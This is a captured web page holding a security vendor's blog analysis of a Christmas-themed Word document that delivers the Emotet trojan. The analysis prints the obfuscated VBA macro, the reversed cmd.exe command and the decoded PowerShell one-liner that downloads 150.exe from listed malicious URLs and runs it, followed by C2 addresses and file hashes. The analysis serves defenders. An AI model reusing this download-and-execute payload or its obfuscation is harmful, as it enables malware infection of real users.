www.picussecurity.com
Open in
urlscan Pro
2606:2c40::c73c:67e3
Public Scan
Submitted URL: https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html
Effective URL: https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc
Submission: On November 04 via api from US — Scanned from DE
Effective URL: https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc
Submission: On November 04 via api from US — Scanned from DE
Form analysis 2 forms found in the DOM
POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/7048931/10a2d0b0-9f91-4cd7-a1e0-1cff39706638
<form novalidate="" accept-charset="UTF-8" action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/7048931/10a2d0b0-9f91-4cd7-a1e0-1cff39706638" enctype="multipart/form-data"
id="hsForm_10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" method="POST"
class="hs-form stacked hs-custom-form hs-form-private hsForm_10a2d0b0-9f91-4cd7-a1e0-1cff39706638 hs-form-10a2d0b0-9f91-4cd7-a1e0-1cff39706638 hs-form-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_b6344b50-97a1-4ada-831d-cce1fea05768"
data-form-id="10a2d0b0-9f91-4cd7-a1e0-1cff39706638" data-portal-id="7048931" target="target_iframe_10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" data-reactid=".hbspt-forms-0" data-hs-cf-bound="true">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field" data-reactid=".hbspt-forms-0.1:$0"><label id="label-email-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" class="" placeholder="Enter your "
for="email-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" data-reactid=".hbspt-forms-0.1:$0.0"><span data-reactid=".hbspt-forms-0.1:$0.0.0"></span></label>
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.1:$0.1"></legend>
<div class="input" data-reactid=".hbspt-forms-0.1:$0.$email"><input id="email-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" class="hs-input" type="email" name="email" required="" placeholder="Email*" value="" autocomplete="email"
data-reactid=".hbspt-forms-0.1:$0.$email.0" inputmode="email"></div>
</div>
<div class="hs_blog_resources_35190412163_subscription hs-blog_resources_35190412163_subscription hs-fieldtype-radio field hs-form-field" style="display:none;" data-reactid=".hbspt-forms-0.1:$1"><label
id="label-blog_resources_35190412163_subscription-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" class="" placeholder="Enter your Notification Frequency" for="blog_resources_35190412163_subscription-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259"
data-reactid=".hbspt-forms-0.1:$1.0"><span data-reactid=".hbspt-forms-0.1:$1.0.0">Notification Frequency</span></label>
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.1:$1.1"></legend>
<div class="input" data-reactid=".hbspt-forms-0.1:$1.$blog_resources_35190412163_subscription"><input name="blog_resources_35190412163_subscription" class="hs-input" type="hidden" value=""
data-reactid=".hbspt-forms-0.1:$1.$blog_resources_35190412163_subscription.0"></div>
</div>
<div class="legal-consent-container" data-reactid=".hbspt-forms-0.2">
<div data-reactid=".hbspt-forms-0.2.1:0">
<div class="hs-dependent-field" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688">
<div class="hs_LEGAL_CONSENT.subscription_type_8300688 hs-LEGAL_CONSENT.subscription_type_8300688 hs-fieldtype-booleancheckbox field hs-form-field"
data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688">
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.1"></legend>
<div class="input" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688">
<ul class="inputs-list" required="" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0">
<li class="hs-form-booleancheckbox" data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0"><label
for="LEGAL_CONSENT.subscription_type_8300688-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" class="hs-form-booleancheckbox-display"
data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0.0"><input
id="LEGAL_CONSENT.subscription_type_8300688-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" class="hs-input" type="checkbox" name="LEGAL_CONSENT.subscription_type_8300688" value="true"
data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0.0.0"><span
data-reactid=".hbspt-forms-0.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0.0.1">
<p>I would like to receive emails including latest blog posts about emerging threats, events, product news, and more from Picus.</p><span class="hs-form-required">*</span>
</span></label></li>
</ul>
</div>
</div>
</div>
<legend class="hs-field-desc checkbox-desc" style="display:none;" data-reactid=".hbspt-forms-0.2.1:0.1"></legend>
</div>
<div class="hs-richtext" data-reactid=".hbspt-forms-0.2.3">
<p>By clicking the button below, you agree our <a href="https://www.picussecurity.com/privacy" target="_blank">Privacy Policy</a>.</p>
</div>
</div>
<div class="hs_submit hs-submit" data-reactid=".hbspt-forms-0.5">
<div class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-0.5.0"></div>
<div class="actions" data-reactid=".hbspt-forms-0.5.1"><input type="submit" value="Subscribe" class="hs-button primary large" data-reactid=".hbspt-forms-0.5.1.0"></div>
</div><noscript data-reactid=".hbspt-forms-0.6"></noscript><input name="hs_context" type="hidden"
value="{"rumScriptExecuteTime":3812.4000000953674,"rumServiceResponseTime":5207.200000286102,"rumFormRenderTime":6.799999713897705,"rumTotalRenderTime":5218.400000095367,"rumTotalRequestTime":1381.7000002861023,"legalConsentOptions":"{\"communicationConsentCheckboxes\":[{\"communicationTypeId\":8300688,\"label\":\"<p>I would like to receive emails including latest blog posts about emerging threats, events, product news, and more from Picus.</p>\",\"required\":true}],\"legitimateInterestLegalBasis\":\"LEGITIMATE_INTEREST_PQL\",\"processingConsentType\":\"IMPLICIT\",\"processingConsentText\":\"<p>By clicking the button below, you agree our <a href=\\\"https://www.picussecurity.com/privacy\\\" target=\\\"_blank\\\">Privacy Policy</a>.</p>\",\"processingConsentCheckboxLabel\":\"<p>I have read the <a href=\\\"https://www.picussecurity.com/hubfs/GDPR%20-%20KVKK%20-%20Privacy%20Docs/Picus_Clarification%20Text.pdf\\\">Clarification Text</a> related to Protection and Processing of Personal Data. I agree that the information that I will provide by filling out this form will be processed under the GDPR and the Personal Data Protection Law No. 6698 in accordance with the conditions specified in the specified in the Clarification Text related to Protection and Processing of Personal Data.</p>\",\"isLegitimateInterest\":false}","embedAtTimestamp":"1667598194303","formDefinitionUpdatedAt":"1648106334310","pageUrl":"https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc","pageTitle":"The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc","source":"FormsNext-static-5.548","sourceName":"FormsNext","sourceVersion":"5.548","sourceVersionMajor":"5","sourceVersionMinor":"548","timestamp":1667598194309,"userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36","originalEmbedContext":{"portalId":"7048931","formId":"10a2d0b0-9f91-4cd7-a1e0-1cff39706638","formInstanceId":"6259","pageId":"35193567243","region":"na1","pageName":"The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc","target":"#hs_form_target_form_499516891","contentType":"blog-post","formsBaseUrl":"/_hcms/forms/","formData":{"cssClass":"hs-form stacked hs-custom-form"}},"canonicalUrl":"https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc","pageId":"35193567243","pageName":"The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc","boolCheckBoxFields":"LEGAL_CONSENT.subscription_type_8300688","formInstanceId":"6259","renderedFieldsIds":["email","LEGAL_CONSENT.subscription_type_8300688"],"formTarget":"#hs_form_target_form_499516891","correlationId":"f472caba-cb5c-4073-bbaa-bd699bbe3c62","contentType":"blog-post","hutk":"c964860ea740212498cd4a72f92d3d1c","captchaStatus":"NOT_APPLICABLE","isHostedOnHubspot":true}"
data-reactid=".hbspt-forms-0.7"><iframe name="target_iframe_10a2d0b0-9f91-4cd7-a1e0-1cff39706638_6259" style="display:none;" data-reactid=".hbspt-forms-0.8"></iframe>
</form>POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/7048931/10a2d0b0-9f91-4cd7-a1e0-1cff39706638
<form novalidate="" accept-charset="UTF-8" action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/7048931/10a2d0b0-9f91-4cd7-a1e0-1cff39706638" enctype="multipart/form-data"
id="hsForm_10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" method="POST"
class="hs-form stacked hs-custom-form hs-form-private hsForm_10a2d0b0-9f91-4cd7-a1e0-1cff39706638 hs-form-10a2d0b0-9f91-4cd7-a1e0-1cff39706638 hs-form-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_e4247ff3-315a-4c94-8b44-4bb328bf0e83"
data-form-id="10a2d0b0-9f91-4cd7-a1e0-1cff39706638" data-portal-id="7048931" target="target_iframe_10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" data-reactid=".hbspt-forms-1" data-hs-cf-bound="true">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field" data-reactid=".hbspt-forms-1.1:$0"><label id="label-email-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" class="" placeholder="Enter your "
for="email-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" data-reactid=".hbspt-forms-1.1:$0.0"><span data-reactid=".hbspt-forms-1.1:$0.0.0"></span></label>
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-1.1:$0.1"></legend>
<div class="input" data-reactid=".hbspt-forms-1.1:$0.$email"><input id="email-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" class="hs-input" type="email" name="email" required="" placeholder="Email*" value="" autocomplete="email"
data-reactid=".hbspt-forms-1.1:$0.$email.0" inputmode="email"></div>
</div>
<div class="hs_blog_resources_35190412163_subscription hs-blog_resources_35190412163_subscription hs-fieldtype-radio field hs-form-field" style="display:none;" data-reactid=".hbspt-forms-1.1:$1"><label
id="label-blog_resources_35190412163_subscription-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" class="" placeholder="Enter your Notification Frequency" for="blog_resources_35190412163_subscription-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489"
data-reactid=".hbspt-forms-1.1:$1.0"><span data-reactid=".hbspt-forms-1.1:$1.0.0">Notification Frequency</span></label>
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-1.1:$1.1"></legend>
<div class="input" data-reactid=".hbspt-forms-1.1:$1.$blog_resources_35190412163_subscription"><input name="blog_resources_35190412163_subscription" class="hs-input" type="hidden" value=""
data-reactid=".hbspt-forms-1.1:$1.$blog_resources_35190412163_subscription.0"></div>
</div>
<div class="legal-consent-container" data-reactid=".hbspt-forms-1.2">
<div data-reactid=".hbspt-forms-1.2.1:0">
<div class="hs-dependent-field" data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688">
<div class="hs_LEGAL_CONSENT.subscription_type_8300688 hs-LEGAL_CONSENT.subscription_type_8300688 hs-fieldtype-booleancheckbox field hs-form-field"
data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688">
<legend class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.1"></legend>
<div class="input" data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688">
<ul class="inputs-list" required="" data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0">
<li class="hs-form-booleancheckbox" data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0"><label
for="LEGAL_CONSENT.subscription_type_8300688-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" class="hs-form-booleancheckbox-display"
data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0.0"><input
id="LEGAL_CONSENT.subscription_type_8300688-10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" class="hs-input" type="checkbox" name="LEGAL_CONSENT.subscription_type_8300688" value="true"
data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0.0.0"><span
data-reactid=".hbspt-forms-1.2.1:0.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.$LEGAL_CONSENT=1subscription_type_8300688.0.0.0.1">
<p>I would like to receive emails including latest blog posts about emerging threats, events, product news, and more from Picus.</p><span class="hs-form-required">*</span>
</span></label></li>
</ul>
</div>
</div>
</div>
<legend class="hs-field-desc checkbox-desc" style="display:none;" data-reactid=".hbspt-forms-1.2.1:0.1"></legend>
</div>
<div class="hs-richtext" data-reactid=".hbspt-forms-1.2.3">
<p>By clicking the button below, you agree our <a href="https://www.picussecurity.com/privacy" target="_blank">Privacy Policy</a>.</p>
</div>
</div>
<div class="hs_submit hs-submit" data-reactid=".hbspt-forms-1.5">
<div class="hs-field-desc" style="display:none;" data-reactid=".hbspt-forms-1.5.0"></div>
<div class="actions" data-reactid=".hbspt-forms-1.5.1"><input type="submit" value="Subscribe" class="hs-button primary large" data-reactid=".hbspt-forms-1.5.1.0"></div>
</div><noscript data-reactid=".hbspt-forms-1.6"></noscript><input name="hs_context" type="hidden"
value="{"rumScriptExecuteTime":3812.4000000953674,"rumServiceResponseTime":5208.700000286102,"rumFormRenderTime":1.5999999046325684,"rumTotalRenderTime":5255.700000286102,"rumTotalRequestTime":1380.5,"legalConsentOptions":"{\"communicationConsentCheckboxes\":[{\"communicationTypeId\":8300688,\"label\":\"<p>I would like to receive emails including latest blog posts about emerging threats, events, product news, and more from Picus.</p>\",\"required\":true}],\"legitimateInterestLegalBasis\":\"LEGITIMATE_INTEREST_PQL\",\"processingConsentType\":\"IMPLICIT\",\"processingConsentText\":\"<p>By clicking the button below, you agree our <a href=\\\"https://www.picussecurity.com/privacy\\\" target=\\\"_blank\\\">Privacy Policy</a>.</p>\",\"processingConsentCheckboxLabel\":\"<p>I have read the <a href=\\\"https://www.picussecurity.com/hubfs/GDPR%20-%20KVKK%20-%20Privacy%20Docs/Picus_Clarification%20Text.pdf\\\">Clarification Text</a> related to Protection and Processing of Personal Data. I agree that the information that I will provide by filling out this form will be processed under the GDPR and the Personal Data Protection Law No. 6698 in accordance with the conditions specified in the specified in the Clarification Text related to Protection and Processing of Personal Data.</p>\",\"isLegitimateInterest\":false}","embedAtTimestamp":"1667598194289","formDefinitionUpdatedAt":"1648106334310","pageUrl":"https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc","pageTitle":"The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc","source":"FormsNext-static-5.548","sourceName":"FormsNext","sourceVersion":"5.548","sourceVersionMajor":"5","sourceVersionMinor":"548","timestamp":1667598194294,"userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.87 Safari/537.36","originalEmbedContext":{"portalId":"7048931","formId":"10a2d0b0-9f91-4cd7-a1e0-1cff39706638","formInstanceId":"2489","pageId":"35193567243","region":"na1","pageName":"The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc","target":"#hs_form_target_form_690212663-1667548330192","contentType":"blog-post","formsBaseUrl":"/_hcms/forms/","formData":{"cssClass":"hs-form stacked hs-custom-form"}},"canonicalUrl":"https://www.picussecurity.com/resource/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc","pageId":"35193567243","pageName":"The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc","boolCheckBoxFields":"LEGAL_CONSENT.subscription_type_8300688","formInstanceId":"2489","renderedFieldsIds":["email","LEGAL_CONSENT.subscription_type_8300688"],"formTarget":"#hs_form_target_form_690212663-1667548330192","correlationId":"573d4a8e-55d7-41aa-a40f-81857600fcc4","contentType":"blog-post","hutk":"c964860ea740212498cd4a72f92d3d1c","captchaStatus":"NOT_APPLICABLE","isHostedOnHubspot":true}"
data-reactid=".hbspt-forms-1.7"><iframe name="target_iframe_10a2d0b0-9f91-4cd7-a1e0-1cff39706638_2489" style="display:none;" data-reactid=".hbspt-forms-1.8"></iframe>
</form>Text Content
This site uses cookies. We use them to collect information about how you
interact with our website and help us to improve your experience. By clicking
“Accept”, you agree to the use of all cookies. You can opt-out or change your
settings by clicking on “Cookie Settings”. You can find out more in our Privacy
Policy.
Cookie settings
Accept Decline All
Login
Login
Platform
PLATFORM
* Platform
* Security Control Validation
* Attack Path Validation
* Detection Rule Validation
*
USE CASES
* Security Posture Management
* Security Control Validation
* Security Control Rationalization
* Enhancing Detection Efficacy
* Compliance Enablement
HOW TO BE A THREAT-CENTRIC?
To stay ahead of changing threat landscape, a mindset shift is needed
Integrations
INTEGRATIONS
* View all Integrations
* Network Security Technologies
* Security Incident and Event Management (SIEM)
* Endpoint Detection and Response (EDR)
* Security Orchestration, Automation and Response (SOAR)
YOUR ULTIMATE GUIDE: THE BAS CHECKLIST
Choosing the right Breach and Attack Simulation
Company
Partners
PARTNER PROGRAM
* About the Partner Program
* Become a Picus Partner
* Partner Portal
TECHNOLOGY ALLIANCES
* Technology Alliance Partner (TAP) Program and Benefits
ACHIEVING A THREAT-CENTRIC APPROACH WITH BAS
To stay ahead of changing threat landscape, a mindset shift is needed
Resources
TOP VULNERABILITIES ACTIVELY EXPLOITED BY CHINESE STATE-SPONSORED APT ACTORS
LV RANSOMWARE ANALYSIS AND SIMULATION
* View all Resources
* Blog
* Purple Academy
* Webinars
* Case Studies & Reports
* Press Releases
* MITRE ATT&CK
HOW BAS WORKS AND WHY IT MATTERS
Breach and attack simulation—why it is crucial to your cybersecurity
START YOUR FREE TRIAL
Contact Us
THE CHRISTMAS CARD YOU NEVER WANTED - A NEW WAVE OF EMOTET IS BACK TO WREAK
HAVOC
Suleyman Ozarslan, PhD | December 22, 2018
KEEP UP TO DATE WITH LATEST BLOG POSTS
Notification Frequency
* I would like to receive emails including latest blog posts about emerging
threats, events, product news, and more from Picus.
*
By clicking the button below, you agree our Privacy Policy.
Cybercriminals take advantage of the holidays to improve their malware
distribution rate. We have spotted samples with Christmas-themed filenames, such
as ChristmasCard.doc, Christmas-Greeting-Card.doc, Christmas-wishes.doc, and
Christmas-Congratulation.doc. When we analyzed the obtained malicious documents,
we saw that they download the infamous Emotet malware, which is a modular
banking Trojan that primarily functions as a downloader or dropper of other
banking Trojans. So, Emotet continues to affect governments, the private and
public sectors.
INITIAL ACCESS
The specific sample analyzed below is the ChristmasCard.doc (SHA256:
1D751C9AA079CC2D42D07D7964D5FAE375127EFA6CA1AC2DFECFD481FE796FBC).
When a victim opens the document, Microsoft Word asks to enable/disable macros.
It reveals that a macro is embedded in the document.
When a user opens the document, it claims that it was created in an earlier
version of Microsoft Office and asks the victim to enable the content, which
launches the code hidden in the macros.
EXECUTION
VBA (Visual Basic for Applications) codes in the embedded macro are given below:
Function EiDJKjLt()
On Error Resume Next
kRZXpYi = Array(TXwzCHKXZ, WiFKpY, NTNqBN, Interaction.Shell(CleanString(nvTFDMcQuDSt.TextBox1), 15 - 15), nAwUAJnM)
Select Case vhWrwwLHwhINhj
Case 21458470
vtPEXawqKYqTzo = 205771406
bJOUowYROCUnaEvkFGjfFijV = Oct(fhaIrJIBLlXViMzUwpUGL + CStr(FcGOrIzszdsmIRwIX + Log(298339837) - lOTYOWtjKGpLOXPb / Hex(328677453)))
MsgBox (bJOUowYROCUnaEvkFGjfFijV)
End Select
End Function
The macro includes obfuscated VBA codes to evade security controls. The most
interesting part of the macro is:
Interaction.Shell(CleanString(nvTFDMcQuDSt.TextBox1), 15 - 15)
In this malicious macro, Interaction.Shell method runs an executable program
written in TextBox1. However, TextBox1 is not seen by the victim, it is hidden
in the document. We used the Debug.Print method to see the content of the
Textbox1, and accessed the following code that is executed by the
Interaction.Shell method:
c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"
We see a heavily obfuscated code to make detection difficult, the only clear
part of the code is
c:\SzCTnucwEfW\SbuaBlErrzYpl\RdPspAGt\..\..\..\windows\system32\cmd.exe. As seen
on this part of the code, three random directories are added after c:\ to bypass
weak security controls, then three \.. are added to traverse back to c:\.
Therefore, the obtained path is c:\windows\system32\cmd.exe that runs the
subsequent commands.
However, those commands are also obfuscated:
"set XhOY=;'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop&&for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"
The second and third commands are interesting:
for /L %V in (497,-1,0)do set xJWn=!xJWn!!XhOY:~%V,1!&&if %V==0 call %xJWn:~6%"
Briefly, these commands print 497 characters long XhOY variable in reverse
order.
Let’s look at XhOY variable:
'JWt'=BTH$}}{hctac}};kaerb;'GGi'=WLb$;hjk$ metI-ekovnI{ )00008 eg- htgnel.)hjk$ metI-teG(( fI;'cRO'=iVj$;)hjk$ ,RFw$(eliFdaolnwoD.lho${yrt{)YIl$ ni RFw$(hcaerof;'exe.'+ori$+'\'+pmet:vne$=hjk$;'njW'=pBF$;'051' = ori$;'abm'=vvs$;)'@'(tilpS.'HgC1qLI06/ln.tfeelc//:ptth@vNdyoSJJX/setirovaf_dda/moc.tramsyotihsayah.www//:ptth@IzIWsGC4W/moc.srettiftuorevirytinirt.www//:ptth@vJwloS1p/moc.kokgnabpac.www//:ptth@dhvXN9L/moc.ierebewneedi.www//:ptth'=YIl$;tneilCbeW.teN tcejbo-wen=lho$;'VfD'=vSK$ llehsrewop
And, XhOY variable in reverse order:
powershell $KSv='\DfV'\;$ohl=new-object Net.WebClient;$lIY='\http://www.ideenweberei.com/L9NXvhd@http://www.capbangkok.com/p1SolwJv@http://www.trinityriveroutfitters.com/W4CGsWIzI@http://www.hayashitoysmart.com/add_favorites/XJJSoydNv@http://cleeft.nl/60ILq1CgH'\.Split('\@'\);$svv='\mba'\;$iro = '\150'\;$FBp='\Wjn'\;$kjh=$env:temp+'\\\'\+$iro+'\.exe'\;foreach($wFR in $lIY){try{$ohl.DownloadFile($wFR, $kjh);$jVi='\ORc'\;If ((Get-Item $kjh).length -ge 80000) {Invoke-Item $kjh;$bLW='\iGG'\;break;}}catch{}}$HTB='\tWJ'\
Now, we can see it is a PowerShell command, but it is obfuscated by using
variable substitution and garbage variable assignments. Even so, we can reveal
the following command by removing the garbage variables, and putting the values
of the variables where they exist.
powershell foreach($wFR in http://www.ideenweberei.com/L9NXvhd@http://www.capbangkok.com/p1SolwJv@http://www.trinityriveroutfitters.com/W4CGsWIzI@http://www.hayashitoysmart.com/add_favorites/XJJSoydNv@http://cleeft.nl/60ILq1CgH'\.Split('\@'\)){try{new-object Net.WebClient.DownloadFile($wFR, $env:temp+'\150'\+'\.exe'\);If ((Get-Item $env:temp+'\150'\+'\.exe'\).length -ge 80000) {Invoke-Item $env:temp+'\150'\+'\.exe'\;break;}}catch{}}
Briefly, this command tries to download 150.exe from the following addresses in
given order via the Net.WebClient.DownloadFile method. Then, if the file is
downloaded successfully it executes the downloaded file by using the Invoke-Item
cmdlet, and exits the loop. It differentiates a successful file download by
comparing the length of the file with -ge 80000 (ge: greater or equal than).
http://www.ideenweberei.com/L9NXvhd
http://www.capbangkok.com/p1SolwJv
http://www.trinityriveroutfitters.com/W4CGsWIzI
http://www.hayashitoysmart.com/add_favorites/XJJSoydNv
http://cleeft.nl/60ILq1CgH
When we started to examine the 150.exe file (SHA256:
5456471B260E664E9485D2CB8321D8E3B3033F700A5BDAAFC94E4BA8046FB87D), we realized
that it is the infamous Emotet trojan.
As expected from an Emotet sample, it tries to download a file from the
following locations:
213.120.119.231:8443
78.189.21.131:80
187.140.90.91:8080
81.150.17.158:50000
1.150.17.158:8443
201.190.150.60:443
After a few failed attempts, it downloaded archivesymbol.exe (SHA256:
5DA7A92311FDA255EFAC52C6BFEBCED31BD584453F6BB4F8DE6CDD1B2505B00F) file from
201.190.150.60:443 to C:\Users\admin\AppData\Local\archivesymbol\ folder. Emotet
artifacts usually mimic the names of known executables. In order to become
persistent on the victim system, Archivesymbol.exe adds its full path to the
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key in the
Registry.
CONCLUSION
In this wave of attacks, Emotet trojan spreads by emails that lure victims into
downloading a Christmas-themed Word document, which contains a macro that
executes a PowerShell script to download a malicious payload. Commands in the
macro are heavily obfuscated for defense evasion.
With the Email Threat Simulation (ETS) Module, Picus customers are able to test
their network and client security systems' blocking performance against any
malicious email, without waiting for infected by malware such as Emotet.
In addition, using the Picus Endpoint Simulation Module (ESM), you can challenge
your endpoint security controls against a wide range of threats, from basic
attacks to Advanced Persistent Threats (APTs), with up-to-date attack techniques
mapped to MITRE’s ATT&CK framework.
As a conclusion, you can continuously verify and improve your security measures
by utilizing the most practical, quick-to-apply, and immediate mitigation
actions provided by Picus.
If you want to know how your enterprise security devices are blocking these
attacks, you can contact us at demo@picussecurity.com. Within a few hours, we
can quickly report to you how your network security systems protect against
Emotet and other current cyber attacks!
PROCESS GRAPH
MITRE’S ATT&CK TECHNIQUES OBSERVED
Initial Access Execution Persistence Defense Evasion Discovery Command and
Control T1193 Spearphishing Attachment T1059 Command-Line Interface T1060
Registry Run Keys / Startup Folder T1140 Deobfuscate/Decode Files or Information
T1012 Query Registry T1071 Standard Application Layer Protocol T1192
Spearphishing Link T1086 PowerShell T1050 New Service T1112 Modify Registry
T1082 System Information Discovery T1065 Uncommonly Used Port 1035 Service
Execution T1057 Process Discovery T1106 Execution through API T1010
Application Window Discovery T1137 Office Application Startup
T1064 Scripting
INDICATOR OF COMPROMISES (IOC)
DELIVERY DOCUMENTS
1D751C9AA079CC2D42D07D7964D5FAE375127EFA6CA1AC2DFECFD481FE796FBC
216C7C9300632A99D808AC6C2BA26A53402AC584504BB7EAC3CBE35B56994D93
